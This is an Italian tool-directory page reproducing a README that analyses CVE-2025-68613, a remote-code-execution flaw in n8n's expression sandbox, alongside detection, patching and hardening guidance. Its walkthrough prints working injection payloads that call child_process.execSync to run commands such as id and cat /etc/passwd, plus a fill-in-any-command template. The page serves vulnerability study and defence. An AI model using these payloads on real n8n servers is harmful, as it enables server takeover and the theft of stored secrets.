Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/ak-cybe/cve-2025-68613-n8n-rce-analysis
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRisposta agli Incidenti
GitHubak-cybe/cve-2025-68613-n8n-rce-analysis

CVE-2025-68613-n8n-rce-analysis

CVE-2025-68613 (n8n) analisi critica di RCE + raccomandazioni difensive (validazione della patch, idee di rilevamento e consigli di hardening)

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
17 mesi faNon ancora revisionato

Banner Intestazione

SVG di Digitazione

Criticità CVSS Istanze Esposte Stato CWE

GIF Hacker GIF Matrix


Divisore

📑 Indice dei Contenuti

  • 🎯 Riepilogo Esecutivo
  • 🐛 La Vulnerabilità
  • 🔬 Analisi Tecnica
  • 💀 Walkthrough di Sfruttamento
  • 💥 Valutazione dell'Impatto
  • 🔍 Rilevamento e Risposta
  • 🛡️ Strategia di Mitigazione
  • 📚 Riferimenti

🎯 Riepilogo Esecutivo

GIF Allerta

CVE-2025-68613 è una vulnerabilità critica di esecuzione di codice remoto nella piattaforma di automazione dei workflow n8n che consente a utenti autenticati di eseguire comandi di sistema arbitrari tramite iniezione di espressioni.


🐛 La Vulnerabilità

GIF Bug

📋 Panoramica CVE

🤖 Cos'è n8n?

n8n è una piattaforma open-source di automazione dei workflow che consente l'integrazione senza codice / a basso codice con oltre 400 applicazioni. È ampiamente utilizzata in:

🏢 Caso d'Uso📝 Descrizione

🔧 Causa Radice Tecnica

root@kitploit:~
🔓 VULNERABILITY CHAIN:
┌─────────────────────────────────────────────────────────────────┐
│  📝 n8n Expression Language → Dynamic Data Handling            │
│                           ↓                                     │
│  ⚠️  Insufficient Sandbox Isolation in Server-Side Eval        │
│                           ↓                                     │
│  💀 Malicious Expression Escapes Sandbox                       │
│                           ↓                                     │
│  🖥️  Access to Node.js child_process Module                    │
│                           ↓                                     │
│  💥 FULL RCE - OS Command Execution                            │
└─────────────────────────────────────────────────────────────────┘

🔬 Analisi Tecnica

GIF Analisi

🎯 Superficie d'Attacco

Prerequisiti per lo Sfruttamento:

#📋 Requisito📝 Dettagli
1️⃣Autenticazione

⚔️ Caratteristiche dell'Attacco

🏷️ Attributo📊 Valore🔥 Rischio
ComplessitàBASSA (AC:L)🔴 Alto

🗺️ Diagramma di Flusso della Vulnerabilità

root@kitploit:~
graph TD
    A[🔐 Authenticated User] -->|Creates| B[📝 New Workflow]
    B -->|Injects| C[💀 Malicious Expression]
    C -->|Triggers| D[⚡ Expression Evaluation]
    D -->|Exploits| E[🔓 Sandbox Escape]
    E -->|Accesses| F[🖥️ Node.js Runtime]
    F -->|Executes| G[💥 OS Command via child_process]
    G -->|Achieves| H[☠️ FULL SERVER COMPROMISE]
    
    style A fill:#4CAF50,color:#fff
    style C fill:#ff9800,color:#fff
    style E fill:#f44336,color:#fff
    style H fill:#9c27b0,color:#fff

💀 Walkthrough di Sfruttamento

GIF Hacker

⚠️ DICHIARAZIONE DI NON RESPONSABILITÀ: Quanto segue è solo a scopo educativo. Lo sfruttamento non autorizzato è illegale.

📸 Screenshot Passo-Passo dello Sfruttamento

🖥️ Passo 1: Accesso all'Istanza n8n

Accesso iniziale alla piattaforma di automazione dei workflow n8n vulnerabile.

Schermata di Benvenuto n8n
🔓 Dashboard di Benvenuto n8n - Punto di Ingresso


➕ Passo 2: Crea Nuovo Workflow

Crea un nuovo workflow che conterrà il payload malevolo.

Creazione Nuovo Workflow
📝 Creazione di un nuovo workflow con "Aggiungi primo passo"


⚡ Passo 3: Aggiungi Trigger Manuale

Configura il trigger del workflow: il Trigger Manuale consente l'esecuzione on-demand.

Configurazione Trigger Manuale
🎯 Selezione del Trigger Manuale per l'attivazione del workflow


📦 Passo 4: Aggiungi Nodo Set

Aggiungi il nodo "Modifica Campi (Set)" che conterrà l'espressione malevola.

Selezione Nodo Set
🔧 Aggiunta del nodo "Modifica Campi (Set)" per l'iniezione del payload


💉 Passo 5: Inietta Payload RCE

Il passo critico: iniettare l'espressione di sandbox escape per ottenere RCE.

Esecuzione Payload RCE
💀 L'espressione malevola esegue con successo il comando 'id'!

root@kitploit:~
// 🔴 PAYLOAD MALEVOLO (NON USARE ILLEGALMENTE)
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString(); })() }}

Output Mostra: uid=1000(node) gid=1000(node) groups=1000(node) ✅ RCE CONFERMATO!


💉 Esempi di Payload

GIF Iniezione Codice

⚠️ ATTENZIONE: Questi payload sono solo per test di sicurezza autorizzati. L'uso non autorizzato è illegale!

🔹 Comando ID (Info Utente)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString(); })() }}

🔹 Comando PWD (Directory Corrente)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString(); })() }}

🔹 Lettura File (/etc/passwd)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('cat /etc/passwd').toString(); })() }}

🔹 Template Comando Personalizzato

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('YOUR_COMMAND_HERE').toString() })() }}

📸 PoC Sfruttamento Lettura File

Exploit lettura file passwd
💀 Lettura di /etc/passwd - Accesso completo al filesystem dimostrato!


📤 Output Previsto


🔍 Analisi della Causa Radice

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────────┐
│  🔴 VULNERABILITY ROOT CAUSE                                            │
├─────────────────────────────────────────────────────────────────────────┤
│                                                                         │
│  The n8n expression evaluator LACKS a sanitizer to prevent function     │
│  expressions from accessing:                                            │
│                                                                         │
│    ❌ this.process        → Node.js process object                      │
│    ❌ mainModule.require  → Module loading system                       │
│    ❌ child_process       → OS command execution                        │
│                                                                         │
│  This allows direct access to system modules and arbitrary code exec!   │
│                                                                         │
└─────────────────────────────────────────────────────────────────────────┘

💀 Riepilogo dell'Impatto

✅ Mitigazione

AGGIORNA ORA

root@kitploit:~
# 🛡️ Aggiorna n8n alla versione corretta
npm install -g n8n@latest

# O con Docker
docker pull n8n/n8n:1.122.0

🎬 Catena di Uccisione dell'Attacco

☠️ Capacità Post-Sfruttamento


💥 Valutazione dell'Impatto

GIF Esplosione

🔺 Analisi Triade CIA

🌍 Esposizione nel Mondo Reale

Istanze Vulnerabili


🔍 Rilevamento e Risposta

GIF Investigatore

🔎 Strategie di Rilevamento

🛠️ Script di Audit Versione

root@kitploit:~
#!/usr/bin/env bash
# 🔍 CVE-2025-68613 n8n version audit

echo "🔍 Checking n8n version..."

if command -v n8n >/dev/null 2>&1; then
    VER="$(n8n --version | tr -d 'v' | head -n1)"
    
    if [[ "$VER" < "1.120.4" ]] && [[ "$VER" >= "0.211.0" ]]; then
        echo "⚠️  VULNERABLE: n8n $VER affected by CVE-2025-68613"
        echo "📦 Required: Upgrade to 1.120.4, 1.121.1, or 1.122.0+"
        exit 2
    else
        echo "✅ SAFE: n8n $VER is patched"
    fi
else
    echo "❌ n8n not found in PATH"
fi

🚨 Checklist Risposta agli Incidenti

  • 🔌 Isolare - Disconnetti l'n8n interessato dalla rete
  • 💾 Preservare - Acquisisci log e manufatti forensi
  • 🔍 Audit - Rivedi tutti i workflow per espressioni malevole
  • 🔄 Ruotare - Cambia tutte le credenziali accessibili
  • 🔀 Rivedere - Verifica indicatori di movimento laterale
  • 📦 Patch - Aggiorna alla versione sicura prima del ripristino

🛡️ Strategia di Mitigazione

GIF Scudo

⚡ Azioni Immediata (Priorità 0)

🐳 Esempio di Rafforzamento Container

root@kitploit:~
# 🛡️ Hardened n8n deployment
FROM n8n/n8n:1.122.0

# 👤 Run as non-root user
USER node

# 🔒 Apply these runtime flags:
# --read-only --tmpfs /tmp:rw,noexec,nosuid
# --cap-drop=ALL --cap-add=NET_BIND_SERVICE
# --security-opt seccomp=n8n-seccomp.json

🔐 Sicurezza a Lungo Termine

🛡️ Misura📝 Implementazione
🌐 Segmentazione di ReteIsola le istanze n8n
🔥 Regole WAF

💬 Domanda per i Blue Teamers 🔵

GIF Pensiero

Come progettereste una regola di rilevamento per identificare tentativi di iniezione di espressioni nelle definizioni dei workflow n8n prima dell'esecuzione, considerando la necessità di bilanciare la sicurezza con l'uso legittimo di espressioni dinamiche?

Bonus: Quali protezioni runtime implementereste per limitare il raggio d'esplosione se si verifica un sandbox escape nonostante la patch?


📚 Riferimenti

GIF Libri

📋 Avvisi Ufficiali

  • 🔗 Dettaglio NVD CVE-2025-68613
  • 🔗 Avviso Snyk

🔬 Analisi Tecnica

  • 📖 Orca Security: RCE Critica n8n
  • 📖 Resecurity: Analisi Approfondita Iniezione di Espressioni
  • 📖 SecureLayer7: Guida allo Sfruttamento RCE

🎮 Risorse Pratiche

  • 🧪 TryHackMe: Lab CVE-2025-68613
  • 💀 Scanner PoC Pubblico

🏷️ Tag

root@kitploit:~
#CVE-2025-68613 #n8n #RCE #Expression-Injection #Workflow-Automation 
#Sandbox-Escape #CWE-913 #Critical-Vulnerability #Pentesting #Blue-Team

Footer

⚠️ DICHIARAZIONE DI NON RESPONSABILITÀ: Questa analisi è solo per scopi educativi e di difesa della sicurezza.
Lo sfruttamento non autorizzato delle vulnerabilità è ILLEGALE.

Autore Ultimo Aggiornamento

Visualizzazioni Profilo

Scarica lo strumento

⚡ Statistiche Rapide

🔥 Metrica📊 Valore
Punteggio CVSS9.9 / 10
Istanze Esposte103.476+
Complessità dell'AttaccoBASSA
Autenticazione RichiestaSì (Privilegi Bassi)
Interazione UtenteNessuna

🎯 Fatti Chiave

📌 Proprietà📝 Valore
Divulgato18 Dicembre 2025
VettoreRete (AV:N)
AmbitoModificato
ImpattoCIA = ALTO
Tipo di ExploitIniezione di Espressioni
ProprietàValore
🆔 ID CVECVE-2025-68613
📊 Punteggio CVSS9.9 (Critica) 🔴
🔗 Vettore CVSSCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
🏷️ CWECWE-913 (Controllo Inadeguato delle Risorse Codice Gestite Dinamicamente)
📦 Versioni Affette0.211.0 → 1.120.3, 1.121.0
✅ Versioni Corrette1.120.4, 1.121.1, 1.122.0+
🔧 DevOpsPipeline di automazione, integrazioni CI/CD
🛡️ Sicurezza OperativaWorkflow SOAR, risposta agli incidenti
💼 BusinessAutomazione dei processi, workflow dati
📊 DatiProcessi ETL, integrazioni API
Account utente n8n valido (privilegi bassi sufficienti)
2️⃣PermessiCapacità di creazione/modifica workflow
3️⃣Accesso di RetePossibilità di raggiungere l'istanza n8n
Interazione Utente
Nessuna Richiesta
🔴 Alto
AmbitoModificato🔴 Critico
🎯 Payload📋 Output Previsto
iduid=1000(node) gid=1000(node) groups=1000(node)
pwd/app
cat /etc/passwdElenco completo utenti di sistema (root, daemon, node, ecc.)
envTutte le variabili d'ambiente inclusi i segreti
ls -la /Elenco del filesystem radice
🎯 Tipo di Impatto📝 Descrizione
💻 Esecuzione Comandi ArbitrariEsegui qualsiasi comando OS
📂 Accesso al File SystemLeggi/scrivi qualsiasi file
🔑 Esposizione Variabili d'AmbienteChiavi API, segreti divulgati
☠️ Compromissione Completa del SistemaPresa di controllo totale del server
🛡️ Severità📊 Valutazione
Punteggio CVSS9.9 / 10
Complessità dell'AttaccoBASSA
Privilegi RichiestiBASSI
Interazione UtenteNESSUNA
Fase🔥 Azione💀 Impatto
1️⃣Accesso InizialeAutenticazione a n8n
2️⃣EsecuzioneInvio di workflow malevolo
3️⃣PersistenzaDistribuzione reverse shell/backdoor
4️⃣C2Stabilimento comando & controllo
5️⃣AzioniEsfiltrazione dati, movimento laterale
🎯 Azione💥 Livello di Impatto
🔑 Furto di CredenzialiEstrai chiavi API, token OAuth, password DB
📤 Esfiltrazione DatiDati dei workflow, log di esecuzione, info aziendali
🔒 PersistenzaCron job, script di avvio, web shell
🔀 Movimento LateralePivot verso database, CI/CD, infrastruttura cloud
🗑️ Manipolazione WorkflowModifica/distrugge logica di automazione

🔴 Riservatezza (ALTA)

  • 🔑 Chiavi API esposte
  • 🔐 Token OAuth divulgati
  • 💾 Password DB accessibili
  • 📜 Log di esecuzione compromessi

🟠 Integrità (ALTA)

  • 📝 Workflow alterati
  • ⚙️ Automazione corrotta
  • 💉 Nodi malevoli iniettati
  • 📊 Dati manipolati

🟡 Disponibilità (ALTA)

  • ⏹️ Servizi interrotti
  • 💀 Risorse esaurite
  • 🔄 Workflow terminati
  • 🖥️ Infrastruttura giù
#📋 Metodo🔍 Cosa Monitorare
📜Analisi LogComandi insoliti dal processo n8n, espressioni fallite
🌐ReteConnessioni in uscita verso IP sconosciuti, richieste POST di grandi dimensioni
⚡RuntimeInvocazioni di child_process, spawn imprevisti
📦Audit VersioneVerifica rispetto all'intervallo di versioni vulnerabili
🔢 Priorità🛠️ Azione📝 Dettagli
🔴 P0PATCH ORAAggiorna a 1.120.4, 1.121.1 o 1.122.0+
🟠 P1Limitare AccessoLimita la creazione di workflow a utenti fidati
🟡 P2Rafforzamento ContainerDistribuisci con restrizioni di sicurezza
Monitora pattern di espressioni
📜 Registrazione AuditAbilita logging completo
🔍 Revisioni di SicurezzaValutazioni regolari dei workflow
🔓 Minimo PrivilegioApplica controlli di accesso